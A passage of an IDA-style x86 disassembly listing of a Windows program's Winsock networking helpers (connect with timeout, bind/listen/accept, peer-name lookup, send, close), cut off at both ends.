push offset a80 ; "80"
push eax
call sub_403BBB
add esp, 1Ch
test eax, eax
jz short loc_4033FE
cmp eax, 0FFFFFFFFh
jz short loc_4033FE
push 1
pop esi
push eax
call sub_403D49
pop ecx
loc_4033F9: ; CODE XREF: sub_4033B0+50�j
mov eax, esi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4033FE: ; CODE XREF: sub_4033B0+38�j
; sub_4033B0+3D�j
xor esi, esi
jmp short loc_4033F9
sub_4033B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403402 proc near ; CODE XREF: sub_403AFB+7D�p
; sub_403BBB+AB�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_4], eax
setz al
mov [ebp+arg_4], eax
lea eax, [ebp+arg_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call ds:dword_411228 ; ioctlsocket
pop ebp
retn
sub_403402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403424 proc near ; CODE XREF: sub_404D33+1C5�p
; sub_404D33+200�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
lea eax, [ebp+arg_0]
push eax
push 4004667Fh
push [ebp+arg_0]
call ds:dword_411228 ; ioctlsocket
xor eax, eax
cmp [ebp+arg_0], eax
setnz al
pop ebp
retn
sub_403424 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403443 proc near ; CODE XREF: sub_408F9D+467�p
; sub_40D201+54�p
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
lea eax, [ebp+var_4]
mov [ebp+var_4], 80h
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+arg_0]
call ds:dword_411250 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_403470
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403470: ; CODE XREF: sub_403443+27�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
lea eax, [ebp+var_84]
push [ebp+var_4]
push eax
call dword_417BB8 ; getnameinfo
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403495 proc near ; CODE XREF: sub_404D33+B2�p
; sub_40DA07+24�p ...
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
lea eax, [ebp+var_4]
mov [ebp+var_4], 80h
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+arg_0]
call ds:dword_411224 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4034C2
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_4034C2: ; CODE XREF: sub_403495+27�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
lea eax, [ebp+var_84]
push [ebp+var_4]
push eax
call dword_417BB8 ; getnameinfo
neg eax
sbb eax, eax
inc eax
leave
retn
sub_403495 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034E7 proc near ; CODE XREF: sub_40E03D+8F�p
; sub_40FFBC+182�p
var_84 = byte ptr -84h
var_82 = dword ptr -82h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
lea eax, [ebp+var_4]
mov [ebp+var_4], 80h
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+arg_0]
call ds:dword_411250 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_403514
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403514: ; CODE XREF: sub_4034E7+27�j
push 0Ah
push [ebp+arg_4]
push [ebp+var_82]
call ds:dword_411248 ; htons
movzx eax, ax
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
push 1
pop eax
leave
retn
sub_4034E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403536 proc near ; CODE XREF: sub_40ED30+142�p
; sub_40FFBC+14A�p
var_84 = byte ptr -84h
var_82 = dword ptr -82h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
lea eax, [ebp+var_4]
mov [ebp+var_4], 80h
push eax
lea eax, [ebp+var_84]
push eax
push [ebp+arg_0]
call ds:dword_411224 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_403563
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403563: ; CODE XREF: sub_403536+27�j
push 0Ah
push [ebp+arg_4]
push [ebp+var_82]
call ds:dword_411248 ; htons
movzx eax, ax
push eax
call sub_410C9A ; _itoa
add esp, 0Ch
push 1
pop eax
leave
retn
sub_403536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403585 proc near ; CODE XREF: sub_408F9D+516�p
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
lea eax, [ebp+arg_0]
push esi
push eax
push 0
push 0
push [ebp+arg_0]
call dword_417BB4 ; getaddrinfo
test eax, eax
jnz short loc_4035F6
mov esi, [ebp+arg_0]
loc_4035A7: ; CODE XREF: sub_403585+51�j
test esi, esi
jz short loc_4035ED
push 2
push 0
push 0
lea eax, [ebp+var_404]
push 401h
push eax
push dword ptr [esi+10h]
push dword ptr [esi+18h]
call dword_417BB8 ; getnameinfo
test eax, eax
jnz short loc_4035D3
cmp dword ptr [esi+4], 2
jz short loc_4035D8
loc_4035D3: ; CODE XREF: sub_403585+46�j
mov esi, [esi+1Ch]
jmp short loc_4035A7
; ---------------------------------------------------------------------------
loc_4035D8: ; CODE XREF: sub_403585+4C�j
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_410820 ; _mbscpy
pop ecx
mov al, 1
pop ecx
jmp short loc_4035F8
; ---------------------------------------------------------------------------
loc_4035ED: ; CODE XREF: sub_403585+24�j
push [ebp+arg_0]
call dword_417BBC ; freeaddrinfo
loc_4035F6: ; CODE XREF: sub_403585+1D�j
xor al, al
loc_4035F8: ; CODE XREF: sub_403585+66�j
pop esi
leave
retn
sub_403585 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035FB proc near ; CODE XREF: sub_401B81+D4�p
; sub_402EFD+33�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 24h
push ebx
push edi
push 1008h
call sub_41082C ; malloc
mov edi, eax
xor ebx, ebx
cmp edi, ebx
pop ecx
jz loc_403714
push 20h
lea eax, [ebp+var_24]
push ebx
push eax
mov [edi], ebx
mov [edi+804h], ebx
call sub_410850 ; memset
add esp, 0Ch
call sub_40331D
neg eax
sbb eax, eax
mov [ebp+var_1C], 1
and al, 0FEh
mov [ebp+var_24], 5
inc eax
inc eax
mov [ebp+var_20], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_0]
push ebx
call dword_417BB4 ; getaddrinfo
test eax, eax
jnz loc_40370D
push esi
mov esi, [ebp+var_4]
cmp esi, ebx
jz loc_4036FF
loc_403675: ; CODE XREF: sub_4035FB+FC�j
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
call ds:dword_41122C ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4036F2
mov eax, [esi+4]
cmp eax, 2
jz short loc_403698
cmp eax, 17h
jnz short loc_4036F2
loc_403698: ; CODE XREF: sub_4035FB+96�j
test [ebp+arg_4], 2
jz short loc_4036B9
lea eax, [ebp+arg_0]
push 4
push eax
push 4
push 0FFFFh
push ebx
mov [ebp+arg_0], 1
call ds:dword_411218 ; setsockopt
loc_4036B9: ; CODE XREF: sub_4035FB+A1�j
push dword ptr [esi+10h]
push dword ptr [esi+18h]
push ebx
call ds:dword_41121C ; bind
cmp eax, 0FFFFFFFFh
jz short loc_4036D9
push 32h
push ebx
call ds:dword_411278 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_4036E2
loc_4036D9: ; CODE XREF: sub_4035FB+CE�j
push ebx
call sub_403D49
pop ecx
jmp short loc_4036F2
; ---------------------------------------------------------------------------
loc_4036E2: ; CODE XREF: sub_4035FB+DC�j
mov eax, [edi]
mov [edi+eax*4+4], ebx
inc dword ptr [edi]
cmp dword ptr [edi], 200h
jz short loc_4036FD
loc_4036F2: ; CODE XREF: sub_4035FB+8E�j
; sub_4035FB+9B�j ...
mov esi, [esi+1Ch]
test esi, esi
jnz loc_403675
loc_4036FD: ; CODE XREF: sub_4035FB+F5�j
xor ebx, ebx
loc_4036FF: ; CODE XREF: sub_4035FB+74�j
push [ebp+var_4]
call dword_417BBC ; freeaddrinfo
cmp [edi], ebx
pop esi
jnz short loc_403718
loc_40370D: ; CODE XREF: sub_4035FB+68�j
push edi
call sub_410832 ; free
pop ecx
loc_403714: ; CODE XREF: sub_4035FB+19�j
xor eax, eax
jmp short loc_40371A
; ---------------------------------------------------------------------------
loc_403718: ; CODE XREF: sub_4035FB+110�j
mov eax, edi
loc_40371A: ; CODE XREF: sub_4035FB+11B�j
pop edi
pop ebx
leave
retn
sub_4035FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40371E proc near ; CODE XREF: sub_401B81+18F�p
; sub_402EFD+7D�p ...
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 90h
and [ebp+var_4], 0
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov [ebp+var_8], 80h
cmp dword ptr [esi], 0
jbe loc_4037C3
lea edi, [esi+4]
loc_403744: ; CODE XREF: sub_40371E+A3�j
lea ebx, [esi+804h]
push ebx
push dword ptr [edi]
call sub_410B58 ; __WSAFDIsSet
test eax, eax
jz short loc_4037B6
mov edx, [ebx]
xor ecx, ecx
test edx, edx
jbe short loc_40379A
mov ebx, [edi]
lea eax, [esi+808h]
loc_403766: ; CODE XREF: sub_40371E+52�j
cmp [eax], ebx
jz short loc_403774
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_403766
jmp short loc_40379A
; ---------------------------------------------------------------------------
loc_403774: ; CODE XREF: sub_40371E+4A�j
dec edx
cmp ecx, edx
jnb short loc_403794
lea eax, [esi+ecx*4+808h]
loc_403780: ; CODE XREF: sub_40371E+74�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [esi+804h]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_403780
loc_403794: ; CODE XREF: sub_40371E+59�j
dec dword ptr [esi+804h]
loc_40379A: ; CODE XREF: sub_40371E+3E�j
; sub_40371E+54�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_90]
push eax
push dword ptr [edi]
call ds:dword_41123C ; accept
cmp eax, 0FFFFFFFFh
jnz loc_4038DC
loc_4037B6: ; CODE XREF: sub_40371E+36�j
inc [ebp+var_4]
add edi, 4
mov eax, [ebp+var_4]
cmp eax, [esi]
jb short loc_403744
loc_4037C3: ; CODE XREF: sub_40371E+1D�j
lea edi, [esi+804h]
xor eax, eax
cmp [esi], eax
mov [ebp+var_4], eax
mov [edi], eax
jbe short loc_40381F
lea ecx, [esi+4]
loc_4037D7: ; CODE XREF: sub_40371E+FF�j
mov edx, [edi]
and [ebp+arg_0], 0
test edx, edx
jbe short loc_4037F8
lea eax, [esi+808h]
loc_4037E7: ; CODE XREF: sub_40371E+D8�j
mov ebx, [ecx]
cmp [eax], ebx
jz short loc_4037F8
inc [ebp+arg_0]
add eax, 4
cmp [ebp+arg_0], edx
jb short loc_4037E7
loc_4037F8: ; CODE XREF: sub_40371E+C1�j
; sub_40371E+CD�j
mov eax, [ebp+arg_0]
cmp eax, edx
jnz short loc_403812
cmp edx, 200h
jnb short loc_403812
mov edx, [ecx]
mov [esi+eax*4+808h], edx
inc dword ptr [edi]
loc_403812: ; CODE XREF: sub_40371E+DF�j
; sub_40371E+E7�j
inc [ebp+var_4]
add ecx, 4
mov eax, [ebp+var_4]
cmp eax, [esi]
jb short loc_4037D7
loc_40381F: ; CODE XREF: sub_40371E+B4�j
mov eax, [ebp+arg_4]
mov ecx, 3E8h
xor edx, edx
mov ebx, ecx
div ebx
xor edx, edx
xor ebx, ebx
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
div ecx
lea eax, [ebp+var_10]
push eax
push ebx
push ebx
push edi
push dword ptr [esi]
imul edx, 3E8h
mov [ebp+var_C], edx
call ds:dword_411214 ; select
cmp eax, ebx
jz loc_4038D9
cmp eax, 0FFFFFFFFh
jnz short loc_403862
xor eax, eax
jmp short loc_4038DC
; ---------------------------------------------------------------------------
loc_403862: ; CODE XREF: sub_40371E+13E�j
cmp [esi], ebx
mov [ebp+var_4], ebx
jbe short loc_4038D9
lea ebx, [esi+4]
loc_40386C: ; CODE XREF: sub_40371E+1B9�j
push edi
push dword ptr [ebx]
call sub_410B58 ; __WSAFDIsSet
test eax, eax
jz short loc_4038CC
xor ecx, ecx
cmp [edi], ecx
jbe short loc_4038B4
lea eax, [esi+808h]
loc_403884: ; CODE XREF: sub_40371E+172�j
mov edx, [ebx]
cmp [eax], edx
jz short loc_403894
inc ecx
add eax, 4
cmp ecx, [edi]
jb short loc_403884
jmp short loc_4038B4
; ---------------------------------------------------------------------------
loc_403894: ; CODE XREF: sub_40371E+16A�j
mov eax, [edi]
dec eax
cmp ecx, eax
jnb short loc_4038B2
lea eax, [esi+ecx*4+808h]
loc_4038A2: ; CODE XREF: sub_40371E+192�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [edi]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_4038A2
loc_4038B2: ; CODE XREF: sub_40371E+17B�j
dec dword ptr [edi]
loc_4038B4: ; CODE XREF: sub_40371E+15E�j
; sub_40371E+174�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_90]
push eax
push dword ptr [ebx]
call ds:dword_41123C ; accept
cmp eax, 0FFFFFFFFh
jnz short loc_4038DC
loc_4038CC: ; CODE XREF: sub_40371E+158�j
inc [ebp+var_4]
add ebx, 4
mov eax, [ebp+var_4]
cmp eax, [esi]
jb short loc_40386C
loc_4038D9: ; CODE XREF: sub_40371E+135�j
; sub_40371E+149�j
or eax, 0FFFFFFFFh
loc_4038DC: ; CODE XREF: sub_40371E+92�j
; sub_40371E+142�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40371E endp
; =============== S U B R O U T I N E =======================================
sub_4038E1 proc near ; CODE XREF: sub_401B81+FF�p
; sub_401B81+2EF�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
xor ebx, ebx
push edi
mov eax, [esi]
test eax, eax
jbe short loc_403913
lea edi, [esi+4]
loc_4038F3: ; CODE XREF: sub_4038E1+30�j
cmp dword_417B68, 0
jz short loc_403901
cmp eax, 64h
ja short loc_403913
loc_403901: ; CODE XREF: sub_4038E1+19�j
push dword ptr [edi]
call sub_403D49
mov eax, [esi]
inc ebx
add edi, 4
cmp ebx, eax
pop ecx
jb short loc_4038F3
loc_403913: ; CODE XREF: sub_4038E1+D�j
; sub_4038E1+1E�j
and dword ptr [esi+804h], 0
push esi
call sub_410832 ; free
pop ecx
pop edi
pop esi
pop ebx
retn
sub_4038E1 endp
; =============== S U B R O U T I N E =======================================
sub_403925 proc near ; CODE XREF: sub_40E18A+149�p
; sub_40ED30+32�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, 200h
ja short loc_403941
push 1010h
call sub_41082C ; malloc
test eax, eax
pop ecx
jnz short loc_403945
loc_403941: ; CODE XREF: sub_403925+B�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_403945: ; CODE XREF: sub_403925+1A�j
and dword ptr [eax+4], 0
mov [eax], esi
pop esi
retn
sub_403925 endp
; =============== S U B R O U T I N E =======================================
sub_40394D proc near ; CODE XREF: sub_40E18A+32C�p
; sub_40ED30+FB�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [eax+4]
cmp ecx, [eax]
jnz short loc_403965
push [esp+arg_0]
call sub_403D49
pop ecx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403965: ; CODE XREF: sub_40394D+9�j
mov edx, [esp+arg_0]
mov [eax+ecx*4+0Ch], edx
inc dword ptr [eax+4]
mov ecx, [eax+4]
xor edx, edx
cmp ecx, [eax]
setnz dl
mov eax, edx
retn
sub_40394D endp
; =============== S U B R O U T I N E =======================================
sub_40397D proc near ; CODE XREF: sub_40E18A+3D3�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
push edi
mov edx, [esi+4]
test edx, edx
jbe short loc_4039CF
lea ecx, [esi+0Ch]
loc_40398F: ; CODE XREF: sub_40397D+20�j
mov edi, [ecx]
cmp edi, [esp+8+arg_0]
jz short loc_4039A1
inc eax
add ecx, 4
cmp eax, edx
jb short loc_40398F
jmp short loc_4039CF
; ---------------------------------------------------------------------------
loc_4039A1: ; CODE XREF: sub_40397D+18�j
mov ecx, [esi+8]
cmp eax, ecx
jb short loc_4039AC
dec ecx
mov [esi+8], ecx
loc_4039AC: ; CODE XREF: sub_40397D+29�j
mov ecx, eax
imul ecx, 3FFFFFFFh
add ecx, edx
shl ecx, 2
push ecx
lea ecx, [esi+eax*4+10h]
lea eax, [esi+eax*4+0Ch]
push ecx
push eax
call sub_410838 ; memcpy
add esp, 0Ch
dec dword ptr [esi+4]
loc_4039CF: ; CODE XREF: sub_40397D+D�j
; sub_40397D+22�j
pop edi
pop esi
retn
sub_40397D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4039D2 proc near ; CODE XREF: sub_40E18A+361�p
; sub_40ED30+11A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
push ebx
xor ebx, ebx
cmp [eax+4], ebx
lea ecx, [eax+80Ch]
mov [eax+8], ebx
mov [ebp+var_4], ebx
mov [ecx], ebx
jbe short loc_403A41
push esi
push edi
lea esi, [eax+0Ch]
loc_4039F5: ; CODE XREF: sub_4039D2+6B�j
mov edi, [ecx]
mov [ebp+arg_0], ebx
cmp edi, ebx
jbe short loc_403A17
lea edx, [eax+810h]
loc_403A04: ; CODE XREF: sub_4039D2+41�j
mov ebx, [esi]
cmp [edx], ebx
jz short loc_403A15
inc [ebp+arg_0]
add edx, 4
cmp [ebp+arg_0], edi
jb short loc_403A04
loc_403A15: ; CODE XREF: sub_4039D2+36�j
xor ebx, ebx
loc_403A17: ; CODE XREF: sub_4039D2+2A�j
mov edx, [ebp+arg_0]
cmp edx, edi
jnz short loc_403A31
cmp edi, 200h
jnb short loc_403A31
mov edi, [esi]
mov [eax+edx*4+810h], edi
inc dword ptr [ecx]
loc_403A31: ; CODE XREF: sub_4039D2+4A�j
; sub_4039D2+52�j
inc [ebp+var_4]
mov edx, [ebp+var_4]
add esi, 4
cmp edx, [eax+4]
jb short loc_4039F5
pop edi
pop esi
loc_403A41: ; CODE XREF: sub_4039D2+1C�j
lea eax, [ebp+var_8]
mov [ebp+var_8], ebx
push eax
push ebx
push ecx
push ebx
push ebx
mov [ebp+var_4], 3E8h
call ds:dword_411214 ; select
cmp eax, ebx
jz short loc_403A67
cmp eax, 0FFFFFFFFh
jz short loc_403A67
push 1
pop eax
jmp short loc_403A69
; ---------------------------------------------------------------------------
loc_403A67: ; CODE XREF: sub_4039D2+89�j
; sub_4039D2+8E�j
xor eax, eax
loc_403A69: ; CODE XREF: sub_4039D2+93�j
pop ebx
leave
retn
sub_4039D2 endp
; =============== S U B R O U T I N E =======================================
sub_403A6C proc near ; CODE XREF: sub_40E18A+372�p
; sub_40ED30+133�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, [esi+8]
cmp edi, [esi+4]
jnb short loc_403A9B
lea ebp, [esi+80Ch]
lea ebx, [esi+edi*4+0Ch]
loc_403A86: ; CODE XREF: sub_403A6C+2D�j
push ebp
push dword ptr [ebx]
call sub_410B58 ; __WSAFDIsSet
test eax, eax
jnz short loc_403AA2
inc edi
add ebx, 4
cmp edi, [esi+4]
jb short loc_403A86
loc_403A9B: ; CODE XREF: sub_403A6C+E�j
xor eax, eax
loc_403A9D: ; CODE XREF: sub_403A6C+40�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_403AA2: ; CODE XREF: sub_403A6C+24�j
lea eax, [edi+1]
mov [esi+8], eax
mov eax, [esi+edi*4+0Ch]
jmp short loc_403A9D
sub_403A6C endp
; =============== S U B R O U T I N E =======================================
sub_403AAE proc near ; CODE XREF: sub_403AE6+4�p
; sub_40E18A+435�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
xor ebp, ebp
xor ebx, ebx
cmp [esi+4], ebp
jbe short loc_403AD6
push edi
lea edi, [esi+0Ch]
loc_403AC2: ; CODE XREF: sub_403AAE+25�j
push dword ptr [edi]
call sub_403D49
mov [edi], ebp
inc ebx
add edi, 4
cmp ebx, [esi+4]
pop ecx
jb short loc_403AC2
pop edi
loc_403AD6: ; CODE XREF: sub_403AAE+E�j
mov [esi+4], ebp
mov [esi+8], ebp
mov [esi+80Ch], ebp
pop esi
pop ebp
pop ebx
retn
sub_403AAE endp
; =============== S U B R O U T I N E =======================================
sub_403AE6 proc near ; CODE XREF: sub_40E18A+483�p
; sub_40ED30+1C2�p
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_403AAE
push [esp+4+arg_0]
call sub_410832 ; free
pop ecx
pop ecx
retn
sub_403AE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403AFB proc near ; CODE XREF: sub_40DB90+15�p
; sub_40E18A+323�p ...
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push 20h
lea eax, [ebp+var_24]
push 0
push eax
call sub_410850 ; memset
add esp, 0Ch
test [ebp+arg_8], 2
jz short loc_403B20
mov [ebp+var_20], 17h
jmp short loc_403B2C
; ---------------------------------------------------------------------------
loc_403B20: ; CODE XREF: sub_403AFB+1A�j
movsx eax, [ebp+arg_8]
and eax, 1
shl eax, 1
mov [ebp+var_20], eax
loc_403B2C: ; CODE XREF: sub_403AFB+23�j
test [ebp+arg_8], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_1C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_417BB4 ; getaddrinfo
test eax, eax
jz short loc_403B56
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_403B56: ; CODE XREF: sub_403AFB+55�j
push esi
mov esi, [ebp+var_4]
push edi
loc_403B5B: ; CODE XREF: sub_403AFB+AD�j
test esi, esi
jz short loc_403BAA
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
call ds:dword_41122C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403BA5
push 0
push edi
call sub_403402
pop ecx
pop ecx
push dword ptr [esi+10h]
push dword ptr [esi+18h]
push edi
call ds:dword_411208 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_403B9E
call ds:dword_411238 ; WSAGetLastError
cmp eax, 2733h
jz short loc_403BAC
loc_403B9E: ; CODE XREF: sub_403AFB+94�j
push edi
call sub_403D49
pop ecx
loc_403BA5: ; CODE XREF: sub_403AFB+78�j
mov esi, [esi+1Ch]
jmp short loc_403B5B
; ---------------------------------------------------------------------------
loc_403BAA: ; CODE XREF: sub_403AFB+62�j
xor edi, edi
loc_403BAC: ; CODE XREF: sub_403AFB+A1�j
push [ebp+var_4]
call dword_417BBC ; freeaddrinfo
mov eax, edi
pop edi
pop esi
leave
retn
sub_403AFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403BBB proc near ; CODE XREF: sub_401985+73�p
; sub_402018+1A�p ...
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 82Ch
mov eax, [ebp+arg_C]
push ebx
mov ecx, 3E8h
push esi
cdq
mov esi, ecx
xor ebx, ebx
idiv esi
push 20h
push ebx
mov [ebp+var_8], eax
mov eax, [ebp+arg_C]
cdq
idiv ecx
lea eax, [ebp+var_28]
push eax
imul edx, 3E8h
mov [ebp+var_4], edx
call sub_410850 ; memset
add esp, 0Ch
test [ebp+arg_8], 2
jz short loc_403C05
mov [ebp+var_24], 17h
jmp short loc_403C11
; ---------------------------------------------------------------------------
loc_403C05: ; CODE XREF: sub_403BBB+3F�j
movsx eax, [ebp+arg_8]
and eax, 1
shl eax, 1
mov [ebp+var_24], eax
loc_403C11: ; CODE XREF: sub_403BBB+48�j
test [ebp+arg_8], 4
push 0
pop eax
setnz al
inc eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword_417BB4 ; getaddrinfo
test eax, eax
jz short loc_403C3E
xor eax, eax
jmp loc_403D23
; ---------------------------------------------------------------------------
loc_403C3E: ; CODE XREF: sub_403BBB+7A�j
mov esi, [ebp+arg_C]
push edi
loc_403C42: ; CODE XREF: sub_403BBB+149�j
cmp esi, ebx
jz loc_403D15
push dword ptr [esi+0Ch]
push dword ptr [esi+8]
push dword ptr [esi+4]
call ds:dword_41122C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_403D01
push ebx
push edi
call sub_403402
pop ecx
pop ecx
push dword ptr [esi+10h]
push dword ptr [esi+18h]
push edi
call ds:dword_411208 ; connect
test eax, eax
jz short loc_403C8B
call ds:dword_411238 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_403D01
loc_403C8B: ; CODE XREF: sub_403BBB+C1�j
lea eax, [ebp+var_8]
mov [ebp+var_828], edi
push eax
lea eax, [ebp+var_82C]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_82C], 1
call ds:dword_411214 ; select
cmp eax, 1
jz short loc_403D09
mov edx, [ebp+var_82C]
xor ecx, ecx
cmp edx, ebx
jbe short loc_403CFA
lea eax, [ebp+var_828]
loc_403CC6: ; CODE XREF: sub_403BBB+115�j
cmp [eax], edi
jz short loc_403CD4
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_403CC6
jmp short loc_403CFA
; ---------------------------------------------------------------------------
loc_403CD4: ; CODE XREF: sub_403BBB+10D�j
dec edx
cmp ecx, edx
jnb short loc_403CF4
lea eax, [ebp+ecx*4+var_828]
loc_403CE0: ; CODE XREF: sub_403BBB+137�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_82C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_403CE0
loc_403CF4: ; CODE XREF: sub_403BBB+11C�j
dec [ebp+var_82C]
loc_403CFA: ; CODE XREF: sub_403BBB+103�j
; sub_403BBB+117�j
push edi
call sub_403D49
pop ecx
loc_403D01: ; CODE XREF: sub_403BBB+A3�j
; sub_403BBB+CE�j
mov esi, [esi+1Ch]
jmp loc_403C42
; ---------------------------------------------------------------------------
loc_403D09: ; CODE XREF: sub_403BBB+F7�j
push 1
push edi
call sub_403402
pop ecx
pop ecx
jmp short loc_403D17
; ---------------------------------------------------------------------------
loc_403D15: ; CODE XREF: sub_403BBB+89�j
xor edi, edi
loc_403D17: ; CODE XREF: sub_403BBB+158�j
push [ebp+arg_C]
call dword_417BBC ; freeaddrinfo
mov eax, edi
pop edi
loc_403D23: ; CODE XREF: sub_403BBB+7E�j
pop esi
pop ebx
leave
retn
sub_403BBB endp
; =============== S U B R O U T I N E =======================================
sub_403D27 proc near ; CODE XREF: sub_401985+1E0�p
; sub_401B81+2E1�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
call ds:dword_411210 ; shutdown
push 3E8h
call ds:dword_4110A4 ; Sleep
push [esp+arg_0]
call sub_403D49
pop ecx
retn
sub_403D27 endp
; =============== S U B R O U T I N E =======================================
sub_403D49 proc near ; CODE XREF: sub_403289+55�p
; sub_40331D+15�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_411240 ; closesocket
retn
sub_403D49 endp
; =============== S U B R O U T I N E =======================================
sub_403D54 proc near ; CODE XREF: sub_401985+110�p
; sub_401B81+207�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call ds:dword_411220 ; send
retn
sub_403D54 endp
; =============== S U B R O U T I N E =======================================
sub_403D69 proc near ; CODE XREF: sub_402EFD+B5�p
